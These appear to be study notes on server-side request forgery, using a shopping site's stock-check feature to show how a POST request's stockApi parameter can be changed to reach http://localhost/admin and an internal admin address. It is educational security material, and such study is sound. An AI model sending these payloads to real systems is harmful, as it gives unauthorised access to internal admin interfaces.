Common Attacks
Attacks Against the Server Itself
- Attacker induces the application to make an HTTP request back to the server that is hosting the application (via loopback)
- Involves supplying the URL with a hostname like 127.0.0.1 or localhost
- Example code -- shopping application that allows user to check stock
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D
6%26storeId%3D1
- Makes request to the URL
- Retrieves the stock status
- Return to the user
- Modify this for an attack:
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-
urlencoded
Content-Length: 118
stockApi=http://localhost/admin
- Server fetches contents of the /admin url and returns to the user
- Authenticates as the machine/server itself
Attacks Against Other Systems
- Assume there is an administrative interface at https://192.168.0.68/admin (opens in a new tab)
- Attack can exploit and access this:
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-
urlencoded
Content-Length: 118
stockApi=http://192.168.0.68/admin